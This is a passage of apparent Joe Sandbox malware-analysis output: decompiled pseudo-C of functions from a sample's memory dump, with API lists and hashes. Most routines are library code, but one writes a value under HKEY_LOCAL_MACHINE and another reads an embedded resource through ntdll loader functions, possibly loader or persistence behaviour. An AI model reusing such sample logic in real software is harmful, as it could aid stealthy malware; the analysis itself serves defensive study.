                                                      • Opcode ID: 60c34cc932e0d0d5f620731a07cb8a59de673b6203500529a3185df5c7ea08ab
                                                      • Instruction ID: 77f56c5e0b70ae88688f1258a2549f44d8c60beea92c973b3041d18e2da12858
                                                      • Opcode Fuzzy Hash: 60c34cc932e0d0d5f620731a07cb8a59de673b6203500529a3185df5c7ea08ab
                                                      • Instruction Fuzzy Hash: 8641B171904219DFCB14DFE4C885AEEBBB5FF44318F14812AE412EB285E7B8A9C5CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E004120C5(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
                                                      				intOrPtr _t33;
                                                      				struct HINSTANCE__* _t44;
                                                      				signed int _t45;
                                                      				_Unknown_base(*)()* _t47;
                                                      				intOrPtr _t54;
                                                      				intOrPtr _t59;
                                                      				void* _t77;
                                                      
                                                      				_t76 = __esi;
                                                      				_t75 = __edi;
                                                      				_push(0x20);
                                                      				E0041F753(E00432B84, __ebx, __edi, __esi);
                                                      				_t59 = __ecx;
                                                      				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
                                                      				 *((intOrPtr*)(__ecx)) = 0x43688c;
                                                      				_t33 =  *((intOrPtr*)(__ecx + 0x44));
                                                      				 *(_t77 - 4) = 2;
                                                      				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
                                                      				if(_t33 == 0) {
                                                      					L7:
                                                      					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
                                                      						L12:
                                                      						E00419E18(_t59, _t59 + 0x24, _t75);
                                                      						E0040ED13(_t59 + 0x64);
                                                      						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
                                                      						_push(_t77 - 0x20);
                                                      						if(E0040EEC3(_t59, 0x4393e0) >= 0) {
                                                      							_t76 = "mfcm80.dll";
                                                      							_t75 = _t77 - 0x1c;
                                                      							asm("movsd");
                                                      							asm("movsd");
                                                      							asm("movsw");
                                                      							asm("movsb");
                                                      							_t44 = GetModuleHandleA(_t77 - 0x1c);
                                                      							if(_t44 != 0) {
                                                      								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
                                                      								if(_t47 != 0) {
                                                      									 *_t47( *(_t77 - 0x20));
                                                      								}
                                                      							}
                                                      							_t45 =  *(_t77 - 0x20);
                                                      							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                      						}
                                                      						 *(_t77 - 4) = 1;
                                                      						E0041A1FB(_t59 + 0x40);
                                                      						 *(_t77 - 4) = 0;
                                                      						E00419FED(_t59, _t59 + 0x24, _t75);
                                                      						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
                                                      						E00404913(_t59);
                                                      						return E0041F7D6(_t59, _t75, _t76);
                                                      					}
                                                      					_t75 = _t59 + 0x40;
                                                      					do {
                                                      						_t76 = E0041A142(_t59, _t75, _t75, _t76);
                                                      						_t85 = _t76;
                                                      						if(_t76 != 0) {
                                                      							E00411888(_t76);
                                                      							_push(_t76);
                                                      							E00402F0C(_t59, _t75, _t76, _t85);
                                                      						}
                                                      					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
                                                      					goto L12;
                                                      				} else {
                                                      					_t75 = __ecx + 0x40;
                                                      					do {
                                                      						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
                                                      						_t76 =  *((intOrPtr*)(E00406B97(_t77 - 0x24)));
                                                      						if(_t76 != 0) {
                                                      							_t54 =  *((intOrPtr*)(_t76 + 4));
                                                      							if(_t54 != 0) {
                                                      								_t82 =  *((intOrPtr*)(_t54 + 0x90));
                                                      								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
                                                      									E0041A173(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
                                                      									E00411888(_t76);
                                                      									_push(_t76);
                                                      									E00402F0C(_t59, _t75, _t76, _t82);
                                                      								}
                                                      							}
                                                      						}
                                                      						_t33 =  *((intOrPtr*)(_t77 - 0x24));
                                                      					} while (_t33 != 0);
                                                      					goto L7;
                                                      				}
                                                      			}











                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 004120CC
                                                      • GetModuleHandleA.KERNEL32(?,004393E0,00000000), ref: 00412197
                                                      • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 004121A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: AddressH_prolog3_HandleModuleProc
                                                      • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                      • API String ID: 2418878492-2500072749
                                                      • Opcode ID: b8a823503778c49e59a79fea30dc8b9f381be7c146b62c3227563022fb454cd2
                                                      • Instruction ID: 22469c7bcacca5b825b37335fd20bb5c9480a0c645dc819855c5a6f900c70753
                                                      • Opcode Fuzzy Hash: b8a823503778c49e59a79fea30dc8b9f381be7c146b62c3227563022fb454cd2
                                                      • Instruction Fuzzy Hash: 5A319E31A00205ABCF15EFA1C9457EE77B5AF49304F1440AEE904EB292DBBCDD85CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E0040FD1D(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr _t29;
                                                      				intOrPtr _t32;
                                                      				intOrPtr _t35;
                                                      				intOrPtr _t36;
                                                      				intOrPtr _t37;
                                                      				signed int _t39;
                                                      				void* _t47;
                                                      				intOrPtr* _t48;
                                                      				void* _t50;
                                                      				void* _t51;
                                                      				void* _t64;
                                                      				void* _t65;
                                                      				intOrPtr _t66;
                                                      				void* _t68;
                                                      				void* _t70;
                                                      
                                                      				_t65 = __edi;
                                                      				_t64 = __edx;
                                                      				_t51 = E0040DBC7(_t50, __ecx, __edi, _t68, __eflags);
                                                      				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                                                      				if(_t29 == 0) {
                                                      					L19:
                                                      					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                                                      				}
                                                      				_t32 = _t29 - 1;
                                                      				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                                                      				if(_t32 != 0) {
                                                      					goto L19;
                                                      				}
                                                      				if(_a4 == 0) {
                                                      					L8:
                                                      					_push(_t65);
                                                      					_t66 =  *((intOrPtr*)(E0040DB94(_t51, _t65, 0, _t77) + 4));
                                                      					_t70 = E0040F089(0x44642c);
                                                      					if(_t70 == 0 || _t66 == 0) {
                                                      						L18:
                                                      						goto L19;
                                                      					} else {
                                                      						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                                                      						_t80 = _t35;
                                                      						if(_t35 == 0) {
                                                      							L12:
                                                      							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                                                      								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                                                      								_a4 = _a4 & 0x00000000;
                                                      								_t83 = _t36;
                                                      								if(_t36 != 0) {
                                                      									_push(_t36);
                                                      									_t39 = E00421C45(_t51, _t64, _t66, _t70, _t83);
                                                      									_push( *((intOrPtr*)(_t70 + 0xc)));
                                                      									_a4 = _t39;
                                                      									E0041E18A(_t51, _t66, _t70, _t83);
                                                      								}
                                                      								_t37 = E0041ECA7(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
                                                      								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                                                      								if(_t37 == 0 && _a4 != _t37) {
                                                      									 *((intOrPtr*)(_t70 + 0xc)) = E0041ECA7(_t51, _t64, _t66, _t70, _a4);
                                                      								}
                                                      							}
                                                      							goto L18;
                                                      						}
                                                      						_push(_t35);
                                                      						if(E00421C45(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                                                      							goto L18;
                                                      						}
                                                      						goto L12;
                                                      					}
                                                      				}
                                                      				if(_a4 != 0xffffffff) {
                                                      					_t47 = E00404C1E();
                                                      					if(_t47 != 0) {
                                                      						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                                                      						_t77 = _t48;
                                                      						if(_t48 != 0) {
                                                      							 *_t48(0, 0);
                                                      						}
                                                      					}
                                                      				}
                                                      				E0040FC51( *((intOrPtr*)(_t51 + 0x20)), _t65);
                                                      				E0040FC51( *((intOrPtr*)(_t51 + 0x1c)), _t65);
                                                      				E0040FC51( *((intOrPtr*)(_t51 + 0x18)), _t65);
                                                      				E0040FC51( *((intOrPtr*)(_t51 + 0x14)), _t65);
                                                      				E0040FC51( *((intOrPtr*)(_t51 + 0x24)), _t65);
                                                      				goto L8;
                                                      			}






















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: __msize_malloc
                                                      • String ID: ,dD
                                                      • API String ID: 1288803200-3191229884
                                                      • Opcode ID: 58876fb9e627804367ae5f76963656d2a1121e4b44d7c996d452b15496b7a07f
                                                      • Instruction ID: 2f4e633648d44568a440bb3fa2de23a969c37f1f238f370252bd419c8cc87b54
                                                      • Opcode Fuzzy Hash: 58876fb9e627804367ae5f76963656d2a1121e4b44d7c996d452b15496b7a07f
                                                      • Instruction Fuzzy Hash: 5E2173315002109FDB34AF72D885A6B77A4BF44714B14853FEC19AAAD6DB38EC85CBD8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0042CC9A() {
                                                      				intOrPtr _t5;
                                                      				intOrPtr _t6;
                                                      				intOrPtr _t10;
                                                      				void* _t12;
                                                      				intOrPtr _t15;
                                                      				intOrPtr* _t16;
                                                      				signed int _t19;
                                                      				signed int _t20;
                                                      				intOrPtr _t26;
                                                      				intOrPtr _t27;
                                                      
                                                      				_t5 =  *0x4483c0;
                                                      				_t26 = 0x14;
                                                      				if(_t5 != 0) {
                                                      					if(_t5 < _t26) {
                                                      						_t5 = _t26;
                                                      						goto L4;
                                                      					}
                                                      				} else {
                                                      					_t5 = 0x200;
                                                      					L4:
                                                      					 *0x4483c0 = _t5;
                                                      				}
                                                      				_t6 = E004265A8(_t5, 4);
                                                      				 *0x4473b8 = _t6;
                                                      				if(_t6 != 0) {
                                                      					L8:
                                                      					_t19 = 0;
                                                      					_t15 = 0x4442e0;
                                                      					while(1) {
                                                      						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                                                      						_t15 = _t15 + 0x20;
                                                      						_t19 = _t19 + 4;
                                                      						if(_t15 >= 0x444560) {
                                                      							break;
                                                      						}
                                                      						_t6 =  *0x4473b8; // 0x2241ea8
                                                      					}
                                                      					_t27 = 0xfffffffe;
                                                      					_t20 = 0;
                                                      					_t16 = 0x4442f0;
                                                      					do {
                                                      						_t10 =  *((intOrPtr*)((_t20 & 0x0000001f) * 0x28 +  *((intOrPtr*)(0x4483e0 + (_t20 >> 5) * 4))));
                                                      						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                                                      							 *_t16 = _t27;
                                                      						}
                                                      						_t16 = _t16 + 0x20;
                                                      						_t20 = _t20 + 1;
                                                      					} while (_t16 < 0x444350);
                                                      					return 0;
                                                      				} else {
                                                      					 *0x4483c0 = _t26;
                                                      					_t6 = E004265A8(_t26, 4);
                                                      					 *0x4473b8 = _t6;
                                                      					if(_t6 != 0) {
                                                      						goto L8;
                                                      					} else {
                                                      						_t12 = 0x1a;
                                                      						return _t12;
                                                      					}
                                                      				}
                                                      			}














                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: __calloc_crt
                                                      • String ID: PCD$`ED$BD
                                                      • API String ID: 3494438863-3786296796
                                                      • Opcode ID: ee61e886c595784a642732bd44bf13424e53494a76758dd75d135ed60843f2d1
                                                      • Instruction ID: 5d6bc2e65ec50afa7cfd9c24b92ad8cceccf8fb15337d2a1a44d9866e0da7712
                                                      • Opcode Fuzzy Hash: ee61e886c595784a642732bd44bf13424e53494a76758dd75d135ed60843f2d1
                                                      • Instruction Fuzzy Hash: 6F11E7323482205BF7149F6EBCD076E2791FB96B24BA4413FF905C7294DB3C8882468C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00407923(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
                                                      				void _v20;
                                                      				int _t14;
                                                      				int _t18;
                                                      				intOrPtr* _t23;
                                                      				void* _t25;
                                                      
                                                      				if(E00407777() == 0) {
                                                      					if(_a4 != 0x12340042) {
                                                      						L9:
                                                      						_t14 = 0;
                                                      						L10:
                                                      						return _t14;
                                                      					}
                                                      					_t23 = _a8;
                                                      					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                      						goto L9;
                                                      					} else {
                                                      						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                      						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                      						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                      						_t18 = GetSystemMetrics(1);
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						 *(_t23 + 0x10) = _t18;
                                                      						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                      						if( *_t23 >= 0x48) {
                                                      							E004215F5(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
                                                      						}
                                                      						_t14 = 1;
                                                      						goto L10;
                                                      					}
                                                      				}
                                                      				return  *0x446290(_a4, _a8);
                                                      			}









                                                      APIs
                                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 00407961
                                                      • GetSystemMetrics.USER32 ref: 00407979
                                                      • GetSystemMetrics.USER32 ref: 00407980
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: System$Metrics$InfoParameters
                                                      • String ID: B$DISPLAY
                                                      • API String ID: 3136151823-3316187204
                                                      • Opcode ID: 2926c6d18e6f0b630ebea8befa15ebd50504e40b77fdf81e56c32f1ff9cf5217
                                                      • Instruction ID: f4921b07837d5c35b9459696712d0f96a64d958530ee0b5bfefb63986bd7101a
                                                      • Opcode Fuzzy Hash: 2926c6d18e6f0b630ebea8befa15ebd50504e40b77fdf81e56c32f1ff9cf5217
                                                      • Instruction Fuzzy Hash: BA11CAB1A04324ABDF119F649D81A9B7B68EF09750F004077FD05BE196D2B5F900CBEA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405D8B(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
                                                      				void* __edi;
                                                      				struct HWND__* _t10;
                                                      				struct HWND__* _t12;
                                                      				struct HWND__* _t14;
                                                      				struct HWND__* _t15;
                                                      				int _t19;
                                                      				void* _t21;
                                                      				void* _t25;
                                                      				struct HWND__** _t26;
                                                      				void* _t27;
                                                      
                                                      				_t25 = __edx;
                                                      				_t21 = __ebx;
                                                      				_t26 = _a4;
                                                      				_t27 = __ecx;
                                                      				if(E0040810E(__ecx, __eflags, _t26) == 0) {
                                                      					_t10 = E0040A584(__ecx);
                                                      					__eflags = _t10;
                                                      					if(_t10 == 0) {
                                                      						L5:
                                                      						__eflags = _t26[1] - 0x100;
                                                      						if(_t26[1] != 0x100) {
                                                      							L13:
                                                      							return E00408550(_t26);
                                                      						}
                                                      						_t12 = _t26[2];
                                                      						__eflags = _t12 - 0x1b;
                                                      						if(_t12 == 0x1b) {
                                                      							L8:
                                                      							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
                                                      							if(__eflags == 0) {
                                                      								goto L13;
                                                      							}
                                                      							_t14 = E0040F7F5(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
                                                      							__eflags = _t14;
                                                      							if(_t14 == 0) {
                                                      								goto L13;
                                                      							}
                                                      							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
                                                      							__eflags = _t15;
                                                      							if(_t15 == 0) {
                                                      								L12:
                                                      								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
                                                      								goto L1;
                                                      							}
                                                      							_t19 = IsWindowEnabled(_t15);
                                                      							__eflags = _t19;
                                                      							if(_t19 == 0) {
                                                      								goto L13;
                                                      							}
                                                      							goto L12;
                                                      						}
                                                      						__eflags = _t12 - 3;
                                                      						if(_t12 != 3) {
                                                      							goto L13;
                                                      						}
                                                      						goto L8;
                                                      					}
                                                      					__eflags =  *(_t10 + 0x68);
                                                      					if( *(_t10 + 0x68) == 0) {
                                                      						goto L5;
                                                      					}
                                                      					return 0;
                                                      				}
                                                      				L1:
                                                      				return 1;
                                                      			}














                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Edit
                                                      • API String ID: 0-554135844
                                                      • Opcode ID: cadf5cdf105f9b2e6c32f1f83ab6765bdb8c0ead7ddf9359437142abd91223ca
                                                      • Instruction ID: 357ecc9c0fe06753b2f7ef8780776397737a938da9b130e61a6109f3b055d991
                                                      • Opcode Fuzzy Hash: cadf5cdf105f9b2e6c32f1f83ab6765bdb8c0ead7ddf9359437142abd91223ca
                                                      • Instruction Fuzzy Hash: B4018430210A01A7EA203B26DC09B9BB7A5EF94754F14483BB581F22E2DB7CDD61CD9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 50%
                                                      			E00401A70(void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				char _v16;
                                                      				struct HINSTANCE__* _v20;
                                                      				_Unknown_base(*)()* _v24;
                                                      				char _v28;
                                                      				_Unknown_base(*)()* _v32;
                                                      				char _v36;
                                                      				intOrPtr _v40;
                                                      				char _v44;
                                                      
                                                      				_v44 = 0;
                                                      				_v28 = 0;
                                                      				_v16 = _a8;
                                                      				_v12 = _a4;
                                                      				_v8 = _a12;
                                                      				_v20 = E00401A10(L"ntdll.dll");
                                                      				_v24 = GetProcAddress(_v20, "LdrFindResource_U");
                                                      				_v32 = GetProcAddress(_v20, "LdrAccessResource");
                                                      				_v40 = _v24(0x400000,  &_v16, 3,  &_v36);
                                                      				if(_v40 >= 0) {
                                                      					_v40 = _v32(0x400000, _v36,  &_v44,  &_v28);
                                                      					if(_v40 >= 0 && _a16 != 0) {
                                                      						 *_a16 = _v28;
                                                      					}
                                                      				}
                                                      				return _v44;
                                                      			}














                                                      APIs
                                                      • GetProcAddress.KERNEL32(?,LdrFindResource_U), ref: 00401AAF
                                                      • GetProcAddress.KERNEL32(?,LdrAccessResource), ref: 00401AC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: AddressProc
                                                      • String ID: LdrAccessResource$LdrFindResource_U$ntdll.dll
                                                      • API String ID: 190572456-309990276
                                                      • Opcode ID: fd4fbc9ac952d96f1e106f0f94c6f3281e9f40c0831bf339fd2d1916f06a4695
                                                      • Instruction ID: 8a5841fff638097e8a695f73e2a584e1330be098e6ee4213b5b30c9d0d5cad24
                                                      • Opcode Fuzzy Hash: fd4fbc9ac952d96f1e106f0f94c6f3281e9f40c0831bf339fd2d1916f06a4695
                                                      • Instruction Fuzzy Hash: F521E7B4D002099FDB04DF94D945BEEBBB4FF88304F10446AE915B7290E778AA44CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402560(intOrPtr __ecx, CHAR* _a4) {
                                                      				void* _v8;
                                                      				int _v12;
                                                      				long _v16;
                                                      				intOrPtr _v20;
                                                      				int _t18;
                                                      				char* _t27;
                                                      				char* _t28;
                                                      
                                                      				_v20 = __ecx;
                                                      				_v8 = 0;
                                                      				_v16 = 0;
                                                      				_t27 =  *0x442000; // 0x4346d4
                                                      				_v16 = RegCreateKeyExA(0x80000002, _t27, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
                                                      				if(_v16 == 0) {
                                                      					_t18 = lstrlenA(_a4);
                                                      					_t28 =  *0x442010; // 0x43465c
                                                      					_v16 = RegSetValueExA(_v8, _t28, 0, 1, _a4, _t18 + 1);
                                                      					RegCloseKey(_v8);
                                                      				}
                                                      				return _v16;
                                                      			}











                                                      APIs
                                                      • RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402598
                                                      • lstrlenA.KERNEL32(?), ref: 004025AB
                                                      • RegSetValueExA.ADVAPI32(00000000,0043465C,00000000,00000001,?,-00000001), ref: 004025C8
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004025D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValuelstrlen
                                                      • String ID: \FC
                                                      • API String ID: 1356686001-3541169775
                                                      • Opcode ID: c7a0b32510f0cb6109f82215027c5292be295ddd1e68631b43d5b4ef6fa880fd
                                                      • Instruction ID: 459d6452fb9c9d5ccab35ccbd8606333e30272a4718eec85ccb3f9d8e5713986
                                                      • Opcode Fuzzy Hash: c7a0b32510f0cb6109f82215027c5292be295ddd1e68631b43d5b4ef6fa880fd
                                                      • Instruction Fuzzy Hash: 8701EDB9A00208BBDB14DF94DD49FAEB7B9EB48700F108159F615A7280D6B56A00DFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E0041295B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t55;
                                                      				signed int _t56;
                                                      				void* _t68;
                                                      
                                                      				_push(0x14);
                                                      				E0041F6EA(E00432C4E, __ebx, __edi, __esi);
                                                      				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
                                                      				if(_t55 > 0xf) {
                                                      					L21:
                                                      					_t56 = 0;
                                                      				} else {
                                                      					switch( *((intOrPtr*)(( *(_t55 + 0x412b1b) & 0x000000ff) * 4 +  &M00412AF3))) {
                                                      						case 0:
                                                      							__eax =  *(__ebp + 0x10);
                                                      							 *__eax = 2;
                                                      							 *(__eax + 8) = 1;
                                                      							goto L4;
                                                      						case 1:
                                                      							_t59 =  *((intOrPtr*)(_t68 + 0x10));
                                                      							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
                                                      							goto L3;
                                                      						case 2:
                                                      							__esi =  *(__ebp + 0x10);
                                                      							__ecx =  *(__ebp + 8);
                                                      							 *__esi = 0xb;
                                                      							__eax = E00413008( *(__ebp + 8));
                                                      							__eax =  ~__eax;
                                                      							asm("sbb eax, eax");
                                                      							 *(__esi + 8) = __ax;
                                                      							goto L4;
                                                      						case 3:
                                                      							__eax =  *(__ebp + 0x10);
                                                      							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
                                                      							L3:
                                                      							 *_t59 = 0xb;
                                                      							goto L4;
                                                      						case 4:
                                                      							__eax = E0040EA5E();
                                                      							__ecx = __ebp + 0xc;
                                                      							__eax = E0040320E(__ebp + 0xc, __eax);
                                                      							__ecx = __ebp + 0xc;
                                                      							 *(__ebp - 4) = 1;
                                                      							__eax = E00403478(__ebp + 0xc, 0xf1c0);
                                                      							goto L19;
                                                      						case 5:
                                                      							__esi =  *(__ebp + 0x10);
                                                      							 *__esi = 3;
                                                      							__eax = GetThreadLocale();
                                                      							 *(__esi + 8) = __eax;
                                                      							goto L4;
                                                      						case 6:
                                                      							__eflags =  *(__esi + 0x5c) - 0xffffffff;
                                                      							if(__eflags == 0) {
                                                      								_push( *(__esi + 0x20));
                                                      								__ecx = __ebp - 0x20;
                                                      								__eax = E0040E75E(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
                                                      								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
                                                      								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
                                                      								__eax = GetTextColor( *(__ebp - 0x18));
                                                      								__ecx = __ebp - 0x20;
                                                      								 *(__esi + 0x60) = __eax;
                                                      								__eax = E0040E7B2(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
                                                      							}
                                                      							__eflags = __edi - 0xfffffd43;
                                                      							__eax =  *(__ebp + 0x10);
                                                      							 *__eax = 3;
                                                      							if(__edi != 0xfffffd43) {
                                                      								__esi =  *(__esi + 0x60);
                                                      							} else {
                                                      								__esi =  *(__esi + 0x5c);
                                                      							}
                                                      							 *(__eax + 8) = __esi;
                                                      							goto L4;
                                                      						case 7:
                                                      							__eflags =  *(__esi + 0x64);
                                                      							if(__eflags != 0) {
                                                      								L15:
                                                      								__edi =  *(__ebp + 0x10);
                                                      								 *__edi = 9;
                                                      								__eax =  *(__esi + 0x64);
                                                      								__ecx =  *__eax;
                                                      								_push(__eax);
                                                      								__eax =  *((intOrPtr*)( *__eax + 4))();
                                                      								__eax =  *(__esi + 0x64);
                                                      								 *(__edi + 8) = __eax;
                                                      								goto L4;
                                                      							} else {
                                                      								__ecx =  *(__esi + 0x20);
                                                      								__eax = E00411C9F( *(__esi + 0x20));
                                                      								__ecx = __esi;
                                                      								__eax = E00412822(__ebx, __esi, __edi, __esi, __eflags, __eax);
                                                      								__eflags =  *(__esi + 0x64);
                                                      								if( *(__esi + 0x64) == 0) {
